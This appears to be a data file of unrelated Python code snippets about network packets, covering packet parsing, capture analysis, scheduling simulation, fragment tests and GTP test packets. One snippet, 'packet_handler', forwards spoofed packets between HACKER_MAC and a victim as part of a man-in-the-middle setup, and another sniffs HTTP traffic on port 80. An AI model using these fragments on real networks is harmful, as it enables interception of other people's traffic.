Is it at max?:\n self.fcip_doc['packet_count'] += 1\n self.packet_count = self.fcip_doc['packet_count']\n if self.fcip_doc['packet_count'] >= self.max_packet_count:\n #*** TBD:\n self.fcip_doc['finalised'] = 1\n self.logger.debug(\"Finalising...\")\n #*** Read suppressed status to variable:\n self.suppressed = self.fcip_doc['suppressed']\n #*** Read verified_direction status to variable:\n self.verified_direction = self.fcip_doc['verified_direction']\n #*** Add packet timestamps, tcp flags etc:\n self.fcip_doc['latest_timestamp'] = pkt_receive_timestamp\n self.fcip_doc['packet_timestamps'].append(pkt_receive_timestamp)\n self.fcip_doc['tcp_flags'].append(tcp.flags)\n self.fcip_doc['packet_lengths'].append(self.packet_length)\n self.fcip_doc['packet_directions'].append(self.packet_direction)\n #*** Write updated FCIP data back to database:\n db_result = self.fcip.update_one({'hash': self.fcip_hash},\n {'$set': {'packet_count': self.fcip_doc['packet_count'],\n 'finalised': self.fcip_doc['finalised'],\n 'packet_timestamps': self.fcip_doc['packet_timestamps'],\n 'tcp_flags': self.fcip_doc['tcp_flags'],\n 'packet_lengths': self.fcip_doc['packet_lengths'],\n 'packet_directions': self.fcip_doc['packet_directions']\n },})\n #*** Tests:\n self.logger.debug(\"max_packet_size is %s\", self.max_packet_size())\n self.logger.debug(\"max_interpacket_interval is %s\",\n self.max_interpacket_interval())\n self.logger.debug(\"min_interpacket_interval is %s\",\n self.min_interpacket_interval())", "def _read_packets(self, reader: Par2FileReader):\n start_count = len(self)\n pointers = reader.get_pointers()\n # Create RecoverySets if needed\n for set_id, pointer_set in packets.by_set_id(pointers).items():\n print(set_id.hex(), pointer_set)\n if set_id not in self.recovery_sets.keys():\n # Create a RecoverySet if needed\n self.recovery_sets[set_id] = RecoverySet(set_id)\n for pointer in pointer_set:\n self.recovery_sets[set_id].packets.add(pointer)\n logger.info(\"Added {} new packets\".format(len(self) - start_count))", "def process_pkts(self):\n while not self.sim_done:\n # wait for metadata and pkt to arrive\n (meta, pkt) = yield self.pkt_in_pipe.get()\n\n # This is where the scheduling algorithm goes\n if self.sched_alg == \"Invert_pkts\":\n yield self.env.process(self.invert_pkts(meta, pkt))\n elif self.sched_alg == \"STFQ\":\n yield self.env.process(self.STFQ(meta, pkt))\n elif self.sched_alg == \"HSTFQ\":\n yield self.env.process(self.HSTFQ(meta, pkt))\n elif self.sched_alg == \"MinRate\":\n yield self.env.process(self.MinRate(meta, pkt))\n elif self.sched_alg == \"RR\":\n yield self.env.process(self.RR(meta, pkt))\n elif self.sched_alg == \"WRR\":\n yield self.env.process(self.WRR(meta, pkt))\n elif self.sched_alg == \"Strict\":\n yield self.env.process(self.Strict(meta, pkt))\n\n # record pkts and ranks\n self.pkts.append(pkt)\n self.ranks.append(meta.ranks[0])\n\n # wait until the scheduling_tree is ready to receive\n yield self.ready_out_pipe.get()\n # write metadata and pkt out\n self.pkt_out_pipe.put((meta, pkt))\n\n wrpcap(PCAP_FILE, self.pkts)\n with open(RANK_FILE, 'w') as f:\n json.dump(self.ranks, f)", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def _iterate_protocol(self):\n # we can't fuzz if we don't have at least one target and one request.\n if not self.targets:\n raise sex.SullyRuntimeError(\"No targets 
specified in session\")\n\n if not self.edges_from(self.root.id):\n raise sex.SullyRuntimeError(\"No requests specified in session\")\n\n self._reset_fuzz_state()\n\n for x in self._iterate_protocol_recursive(this_node=self.root, path=[]):\n yield x", "def output_generator(pkt):\r\n ethe_header = pkt[0]\r\n ip_header = pkt[1]\r\n protocol = pkt[1][7]\r\n data_header = pkt[2]\r\n ethe_prefix = \"ETHER: \"\r\n ip_prefix = \"IP: \"\r\n tcp_prefix = \"TCP: \"\r\n udp_prefix = \"UDP: \"\r\n icmp_prefix = \"ICMP: \"\r\n # print ether header information\r\n print(\"\\n\" + ethe_prefix + \"----- Ether Header -----\")\r\n print(ethe_prefix)\r\n print(ethe_prefix + \"Packet size = \" + str(ethe_header[0]) + \" bytes\")\r\n print(ethe_prefix + \"Destination = \" + str(ethe_header[1]))\r\n print(ethe_prefix + \"Source = \" + str(ethe_header[2]))\r\n print(ethe_prefix + \"Ethertype = \" + str(ethe_header[3]) + \" (IP)\")\r\n print(ethe_prefix)\r\n\r\n print(ip_prefix + \"----- IP Header -----\")\r\n print(ip_prefix)\r\n print(ip_prefix + \"Version = \" + str(ip_header[0]))\r\n print(ip_prefix + \"Header length = \" + str(4 * int(ip_header[1])) + \" bytes\")\r\n print(ip_prefix + \"Type of service = 0x\" + str(ip_header[2]))\r\n if str(ip_header[2]) == \"00\":\r\n print(ip_prefix + \"\\txxx. .... = 0 (precedence)\")\r\n print(ip_prefix + \"\\t...0 .... = normal delay\")\r\n print(ip_prefix + \"\\t.... 0... = normal throughput\")\r\n print(ip_prefix + \"\\t.... .0.. = normal reliability\")\r\n print(ip_prefix + \"Total length = \" + str(ip_header[3]) + \" bytes\")\r\n print(ip_prefix + \"Identification = \" + str(ip_header[4]))\r\n print(ip_prefix + \"Flags = 0x\" + str(ip_header[5]))\r\n flag = str(format(int(ip_header[5][0]), '04b'))\r\n if flag[0] == \"0\":\r\n print(ip_prefix + \"\\t0... ... = Reserved bit: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t1... ... = Reserved bit: set\")\r\n if flag[1] == \"0\":\r\n print(ip_prefix + \"\\t.0.. ... = Don't fragment: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t.1.. ... = Don't fragment: set\")\r\n if flag[2] == \"0\":\r\n print(ip_prefix + \"\\t..0. ... = More fragments: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t..1. ... 
= More fragments: set\")\r\n flag_offset = str((int(ip_header[5][2:3])))\r\n print(ip_prefix + \"Fragment offset = \" + flag_offset + \" bytes\")\r\n print(ip_prefix + \"Time to live = \" + str(ip_header[6]) + \" seconds/hops\")\r\n if protocol == 1:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (ICMP)\")\r\n if protocol == 17:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (UDP)\")\r\n if protocol == 6:\r\n print(ip_prefix + \"Protocol = \" + str(protocol) + \" (TCP)\")\r\n print(ip_prefix + \"Header checksum = \" + str(ip_header[8]))\r\n print(ip_prefix + \"Source address = \" + str(ip_header[9]))\r\n print(ip_prefix + \"Destination address = \" + str(ip_header[10]))\r\n if ip_header[11] == \"\":\r\n print(ip_prefix + \"No options\")\r\n else:\r\n print(ip_prefix + \"Options: \" + ip_header[11])\r\n print(ip_prefix)\r\n\r\n if protocol == 1:\r\n print(icmp_prefix + \"----- ICMP Header -----\")\r\n print(icmp_prefix)\r\n if str(data_header[0]) == \"8\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo request)\")\r\n elif str(data_header[0]) == \"0\":\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]) + \" (Echo reply)\")\r\n else:\r\n print(icmp_prefix + \"Type = \" + str(data_header[0]))\r\n print(icmp_prefix + \"Code = \" + str(data_header[1]))\r\n print(icmp_prefix + \"Checksum = \" + str(data_header[2]))\r\n print(icmp_prefix)\r\n\r\n elif protocol == 6:\r\n print(tcp_prefix + \"----- TCP Header -----\")\r\n print(tcp_prefix)\r\n print(tcp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(tcp_prefix + \"Destination port = \" + str(data_header[1]))\r\n print(tcp_prefix + \"Sequence number = \" + str(data_header[2]))\r\n print(tcp_prefix + \"Acknowledgement number = \" + str(data_header[3]))\r\n print(tcp_prefix + \"Data offset = \" + str(data_header[4]) + \" bytes\")\r\n flag = str(data_header[5])\r\n print(tcp_prefix + \"\\tReserved: Not set\")\r\n print(tcp_prefix + \"\\tNonce: Not set\")\r\n if flag[0] == \"0\":\r\n print(tcp_prefix + \"\\tCWR: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tCWR: Set\")\r\n if flag[1] == \"0\":\r\n print(tcp_prefix + \"\\tECN-Echo : No set\")\r\n else:\r\n print(tcp_prefix + \"\\tECN-Echo: Set\")\r\n if flag[2] == \"0\":\r\n print(tcp_prefix + \"\\tUrgent: Not set\")\r\n else:\r\n print(tcp_prefix + \"\\tUrgent: Set\")\r\n if flag[3] == \"0\":\r\n print(tcp_prefix + \"\\tAcknowledgment: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tAcknowledgment: Set\")\r\n if flag[4] == \"0\":\r\n print(tcp_prefix + \"\\tPush: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tPush: Set\")\r\n if flag[5] == \"0\":\r\n print(tcp_prefix + \"\\tReset: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tReset: Set\")\r\n if flag[6] == \"0\":\r\n print(tcp_prefix + \"\\tSyn: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tSyn: Set\")\r\n if flag[7] == \"0\":\r\n print(tcp_prefix + \"\\tFin: No set\")\r\n else:\r\n print(tcp_prefix + \"\\tFin: Set\")\r\n print(tcp_prefix + \"Window = \" + str(data_header[6]))\r\n print(tcp_prefix + \"Checksum 0x= \" + str(data_header[7]))\r\n print(tcp_prefix + \"Urgent pointers = \" + str(data_header[8]))\r\n if data_header[9] != 0:\r\n print(tcp_prefix + \"Options\")\r\n else:\r\n print(tcp_prefix + \"No options\")\r\n print(tcp_prefix)\r\n\r\n elif protocol == 17:\r\n print(udp_prefix + \"----- UDP Header -----\")\r\n print(udp_prefix)\r\n print(udp_prefix + \"Source port = \" + str(data_header[0]))\r\n print(udp_prefix + \"Destination port = \" + str(data_header[1]))\r\n 
print(udp_prefix + \"Length = \" + str(data_header[2]))\r\n print(udp_prefix + \"Checksum = \" + str(data_header[3]))\r\n print(udp_prefix)", "def process_packet(self, in_port, packet):\n \n buf = bytearray(packet)\n for idx in range((len(packet) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n if self.disabled:\n logging.debug(\"Switch is disabled; discarding packet\")\n return\n\n parsed_packet = ParsedPacket(buf, self.metadata)\n logging.debug(\"Processing packet %d from port %d with %s\" % \n (parsed_packet.id, in_port,\n self.first_processor.name))\n self.first_processor.process(parsed_packet)", "def next_packet(filename, memorymap=True):\n with open(filename, 'rb') as f:\n \n #memory map the file if necessary (prob requires 64 bit systems)\n _file = f\n if memorymap:\n _file = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)\n \n while True:\n packet = _file.read(TS.PACKET_SIZE)\n if packet:\n # first byte SHOULD be the sync byte\n # but if it isn't find one.\n if packet[0] != TS.SYNC_BYTE:\n start_byte = 0\n print packet[0]\n for i in range(start_byte, TS.PACKET_SIZE):\n if packet[i] == TS.SYNC_BYTE:\n start_byte = i\n break\n # didn't find a new start? FAIL\n if start_byte == 0:\n raise Exception(\"failure to find sync byte in ts packet size.\")\n continue\n remainder = _file.read(TS.PACKET_SIZE - start_byte)\n packet = packet[start_byte:] + remainder\n yield packet\n else:\n break", "def packetSniff():\n\n packets = psutil.net_io_counters(pernic=True)\n interfaces = {}\n x = 0\n for p in packets.items():\n values = {}\n values['name'] = p[0]\n values['bytes_sent'] = p[1][0]\n values['bytes_recv'] = p[1][1]\n values['pckt_sent'] = p[1][2]\n values['pckt_recv'] = p[1][3]\n values['errin'] = p[1][4]\n values['errout'] = p[1][5]\n values['dropin'] = p[1][6]\n values['dropout'] = p[1][7]\n\n if ((values['bytes_sent'] or values['bytes_recv'] or\n values['pckt_sent'] or values['pckt_recv']) != 0):\n\n interfaces[x] = values\n x += 1\n else:\n pass\n\n return interfaces", "def get_connections(capture):\n ip_dict = dict()\n for pkt in capture:\n\n if not hasattr(pkt, \"ip\") and not hasattr(pkt, \"ipv6\"):\n continue\n\n protocol = pkt.highest_layer\n\n tcp_dst_port = None\n tcp_src_port = None\n if hasattr(pkt, \"tcp\"):\n tcp_src_port = pkt.tcp.srcport\n tcp_dst_port = pkt.tcp.dstport\n\n if hasattr(pkt, \"ip\"):\n if pkt.ip.src.startswith(\"192.168.178\"):\n ip, dst = pkt.ip.src, pkt.ip.dst\n else:\n ip, dst = pkt.ip.dst, pkt.ip.src\n tcp_dst_port = tcp_src_port\n else:\n # TODO: how to discern src and dst in IPv6?\n ip, dst = pkt.ipv6.src, pkt.ipv6.dst\n\n ip = \"%s\" % ip\n dkey = (\n \"%s\" % protocol,\n int(tcp_dst_port) if tcp_dst_port else None,\n \"%s\" % dst\n )\n if ip not in ip_dict:\n ip_dict[ip] = {dkey: 1}\n else:\n ip_dict[ip][dkey] = ip_dict[ip].get(dkey, 0) + 1\n return ip_dict", "def gen_flow_session(self, set_choice, seq_len):\r\n return_seq = []\r\n chosen_set = self.split_flow[set_choice]\r\n\r\n for poi_index, group in chosen_set.groupby('poi_index'):\r\n for i in range(group.shape[0] - seq_len + 1):\r\n flow_seq = group['flow'].iloc[i:i+seq_len]\r\n if flow_seq.sum() > 0:\r\n return_seq.append([poi_index, flow_seq.to_list()])\r\n return return_seq", "def sniff_packets(iface=None):\n if iface: # (http)\n sniff(filter=\"port 80\", prn=process_packet, iface=iface, store=False)\n # 'process_packet' is the callback\n else:\n sniff(filter=\"port 80\", prn=process_packet, store=False)\n # default interface", "def process_incoming_packets(self, 
timestamped_packets):\n\n t1 = time.monotonic()\n\n # Invariant to be guaranteed: all packets in 'same_session_packets' have the same 'sessionUID' field.\n same_session_packets = []\n\n for (timestamp, packet) in timestamped_packets:\n\n if len(packet) < ctypes.sizeof(PacketHeader):\n logging.error(\"Dropped bad packet of size {} (too short).\".format(len(packet)))\n continue\n\n header = PacketHeader.from_buffer_copy(packet)\n\n packet_type_tuple = (header.packetFormat, header.packetVersion, header.packetId)\n\n packet_type = HeaderFieldsToPacketType.get(packet_type_tuple)\n if packet_type is None:\n logging.error(\"Dropped unrecognized packet (format, version, id) = {!r}.\".format(packet_type_tuple))\n continue\n\n if len(packet) != ctypes.sizeof(packet_type):\n logging.error(\"Dropped packet with unexpected size; \"\n \"(format, version, id) = {!r} packet, size = {}, expected {}.\".format(\n packet_type_tuple, len(packet), ctypes.sizeof(packet_type)))\n continue\n\n if header.packetId == PacketID.EVENT: # Log Event packets\n event_packet = unpack_udp_packet(packet)\n logging.info(\"Recording event packet: {}\".format(event_packet.eventStringCode.decode()))\n\n # NOTE: the sessionUID is not reliable at the start of a session (in F1 2018, need to check for F1 2019).\n # See: http://forums.codemasters.com/discussion/138130/bug-f1-2018-pc-v1-0-4-udp-telemetry-bad-session-uid-in-first-few-packets-of-a-session\n\n # Create an INSERT-able tuple for the data in this packet.\n #\n # Note that we convert the sessionUID to a 16-digit hex string here.\n # SQLite3 can store 64-bit numbers, but only signed ones.\n # To prevent any issues, we represent the sessionUID as a 16-digit hex string instead.\n\n session_packet = SessionPacket(\n timestamp,\n header.packetFormat, header.gameMajorVersion, header.gameMinorVersion,\n header.packetVersion, header.packetId, \"{:016x}\".format(header.sessionUID),\n header.sessionTime, header.frameIdentifier, header.playerCarIndex,\n packet\n )\n\n if len(same_session_packets) > 0 and same_session_packets[0].sessionUID != session_packet.sessionUID:\n # Write 'same_session_packets' collected so far to the correct session database, then forget about them.\n self._process_same_session_packets(same_session_packets)\n same_session_packets.clear()\n\n same_session_packets.append(session_packet)\n\n # Write 'same_session_packets' to the correct session database, then forget about them.\n # The 'same_session_packets.clear()' is not strictly necessary here, because 'same_session_packets' is about to\n # go out of scope; but we make it explicit for clarity.\n\n self._process_same_session_packets(same_session_packets)\n same_session_packets.clear()\n\n t2 = time.monotonic()\n\n duration = (t2 - t1)\n\n logging.info(\"Recorded {} packets in {:.3f} ms.\".format(len(timestamped_packets), duration * 1000.0))", "def test_overlap1(self):\n\n fragments = []\n for _, frags_400, frags_300 in self.pkt_infos:\n if len(frags_300) == 1:\n fragments.extend(frags_400)\n else:\n for i, j in zip(frags_300, frags_400):\n fragments.extend(i)\n fragments.extend(j)\n\n dropped_packet_indexes = set(\n index for (index, _, frags) in self.pkt_infos if len(frags) > 1\n )\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(\n len(self.pkt_infos) - len(dropped_packet_indexes)\n )\n self.verify_capture(packets, dropped_packet_indexes)\n self.src_if.assert_nothing_captured()", "def __parse_tree(self, packet):\n info = 
extract_int_data(packet[Ether])\n logger.info('Processing packet with info [%s]', info)\n\n macs = search.findall_by_attr(self.tree, info.get('srcMac'),\n name='name', maxlevel=2, maxcount=1)\n\n mac = None\n src_ip = None\n dst_ip = None\n dst_port = None\n packet_size = None\n\n if len(macs) > 0:\n mac = macs[0]\n src_ips = search.findall_by_attr(\n mac, info.get('srcIP'), name='name', maxlevel=2, maxcount=1)\n if len(src_ips) is not 0:\n src_ip = src_ips[0]\n dst_ips = search.findall_by_attr(\n src_ip, info.get('dstIP'), name='name', maxlevel=2,\n maxcount=1)\n if len(dst_ips) is not 0:\n dst_ip = dst_ips[0]\n logger.info('Processing source IPs - %s', src_ips)\n dst_ports = search.findall_by_attr(\n dst_ip, info.get('dstPort'), name='name',\n maxlevel=2, maxcount=1)\n if len(dst_ports) is not 0:\n dst_port = dst_ports[0]\n packet_sizes = search.findall_by_attr(\n dst_port, info.get('packet_size'),\n name='name', maxlevel=2, maxcount=1)\n if len(packet_sizes) is not 0:\n packet_size = packet_sizes[0]\n\n return mac, src_ip, dst_ip, dst_port, packet_size", "def find_ports(destination):\n output_ports = set()\n if isinstance(destination, collections.Iterable):\n for device in destination:\n # ports leading to device\n ports_towards_device = self.forwarding_table.get(\n device, self.ports)\n output_ports.update(ports_towards_device)\n else:\n output_ports.update(\n self.forwarding_table.get(destination, self.ports))\n return output_ports", "def preprocess_capture(data, ip_version=4, transp_layer=\"TCP\"):\n #SEE: https://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html\n\n #TODO Implement ipv6, udp and ICMP\n if ip_version == 4:\n pass\n else:\n raise ValueError('IP version must be \"4\"')\n\n if transp_layer == \"TCP\":\n pass\n else:\n raise ValueError('transport layer must be TCP')\n\n try:\n capt = pyshark.FileCapture(data, keep_packets=False, display_filter='tcp')\n except:\n exit(\"Could not open pcap file\")\n\n ip_fields = ['src', 'dst', 'flags_df', 'flags_mf', 'hdr_len', 'len', 'ttl']\n tcp_fields = ['srcport', 'dstport', 'flags_ack', 'flags_fin', 'flags_push',\n 'flags_reset', 'flags_syn', 'flags_urg', 'hdr_len', 'len']\n\n #Temporary list to feed the final DataFrame (Performance)\n tmp = []\n counter = 0\n logging.info(\"Starting packet processing\")\n for pkt in capt:\n filtered = {}\n #First field is a empty string (ignoring)\n if hasattr(pkt, 'ip'):\n for field in ip_fields:\n #Changing field names for disambiguation in columns\n filtered[\"ip_\"+field] = pkt[\"ip\"].get_field(field)\n else:\n continue\n if hasattr(pkt, 'tcp'):\n for field in tcp_fields:\n #Changing field names for disambiguation in columns\n filtered[\"tcp_\"+field] = pkt[\"tcp\"].get_field(field)\n else:\n continue\n tmp.append(filtered)\n counter += 1\n if counter % 1000 == 0:\n logging.info(\"Processed %d packets\", counter)\n logging.info(\"Ended packet processing\")\n logging.info(\"Converting list to DataFrame\")\n X = pd.DataFrame(tmp)\n logging.info(\"Ended list conversion\")\n return X", "def test_overlap1(self):\n\n fragments = []\n for _, _, frags_300, frags_200 in self.pkt_infos:\n if len(frags_300) == 1:\n fragments.extend(frags_300)\n else:\n for i, j in zip(frags_200, frags_300):\n fragments.extend(i)\n fragments.extend(j)\n\n self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(len(self.pkt_infos))\n self.verify_capture(packets)\n self.src_if.assert_nothing_captured()\n\n # run it all to verify correctness\n 
self.pg_enable_capture()\n self.src_if.add_stream(fragments)\n self.pg_start()\n\n packets = self.dst_if.get_capture(len(self.pkt_infos))\n self.verify_capture(packets)\n self.src_if.assert_nothing_captured()", "def decomptcptxpackets(self) :\n\t\ttry :\n\t\t\treturn self._decomptcptxpackets\n\t\texcept Exception as e:\n\t\t\traise e", "def partition(pred, iterable):\n stream = list(iterable)\n matched = list(itertools.takewhile(pred, stream))\n unmatched = list(itertools.dropwhile(pred, stream))\n return matched, unmatched", "def buildPackets(self):\n return self.input", "async def _get_packet_from_stream(self, stream, existing_data, \n got_first_packet=True, \n psml_structure=None,\n timeout:float=3.0):\n import asyncio\n from pyshark.tshark.tshark_json import packet_from_json_packet\n from pyshark.tshark.tshark_xml import packet_from_xml_packet, psml_structure_from_xml\n\n # yield each packet in existing_data\n if self.use_json:\n packet, existing_data = self._extract_packet_json_from_data(existing_data,\n got_first_packet=got_first_packet)\n else:\n packet, existing_data = self._extract_tag_from_data(existing_data)\n\n if packet:\n if self.use_json:\n packet = packet_from_json_packet(packet)\n else:\n packet = packet_from_xml_packet(packet, psml_structure=psml_structure)\n return packet, existing_data\n\n if(not self.is_open.value):\n raise EOFError()\n \n \n future = asyncio.create_task(stream.read(self.DEFAULT_BATCH_SIZE))\n try:\n await asyncio.wait_for(future, timeout)\n except asyncio.TimeoutError:\n return False, existing_data\n\n new_data = future.result()\n\n existing_data += new_data\n\n if not new_data:\n # Reached EOF\n raise EOFError()\n return None, existing_data", "def traffic_permutation(request):\n global AVP_MAC, NVP_MAC, UDP_SPORT, SRC_IP, DST_IP, OUTER_SRC_MAC,\\\n OUTER_DST_MAC, PKT_TYPE\n\n # Values common to all packet types\n SRC_IP = VTEP_PEER_IP\n DST_IP = S1_LO_IP\n OUTER_SRC_MAC = HOST3_MAC\n OUTER_DST_MAC = SW_MAC\n AVP_MAC = AVP1_MAC\n\n # NVP_MAC updated based on pkt_type\n NVP_MAC_dict = {TrafficType.l2_basic: NVP1_MAC,\n TrafficType.stp: STP_DEST_MAC,\n TrafficType.broadcast: BROADCAST_MAC,\n TrafficType.multicast: MULTICAST_MAC,\n TrafficType.lldp: LLDP_MAC}\n\n PKT_TYPE_dict = {TrafficType.l2_basic: 'l2_basic',\n TrafficType.stp: 'stp',\n TrafficType.broadcast: 'broadcast',\n TrafficType.multicast: 'multicast',\n TrafficType.lldp: 'lldp'}\n\n NVP_MAC = NVP_MAC_dict[request.param]\n PKT_TYPE = PKT_TYPE_dict[request.param]\n\n yield request.param", "def find_transfer_ip(allocated):\n for ip_addr in ip_network(TRANSFER_NET_IP4).hosts():\n if ip_addr in allocated:\n continue\n\n # create matching ipv6 address\n ip6_addr = ip_address(\"fec0::a:cf:%X:%X\" % (ip_addr.packed[2],\n ip_addr.packed[3]))\n\n if ip6_addr not in allocated:\n yield [str(ip_addr), str(ip6_addr)]", "def process(self, packet):\n pass", "def remove_buffered_packets(self):\n seq = self.next_seq\n while True:\n p = self.buffer.pop(seq, None)\n if p is None:\n break\n else:\n seq += len(p.data)\n yield p", "def gtp_packets(\n self, type='fdir', tunnel_pkt='gtpu', inner_L3='ipv4',\n match_opt='matched', chk='', teid=0xF):\n pkts = []\n pkts_gtpc_pay = {'IPV4/GTPC': 'Ether()/IP()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPC': 'Ether()/IPv6()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_pay = {'IPV4/GTPU': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU': 
'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv4 = {'IPV4/GTPU/IPV4': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv6 = {'IPV4/GTPU/IPV6/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n if match_opt == 'matched':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = pkts_gtpc_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = pkts_gtpu_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = pkts_gtpu_ipv4\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = pkts_gtpu_ipv6\n\n if match_opt == 'not matched':\n if type is 'fdir':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n 
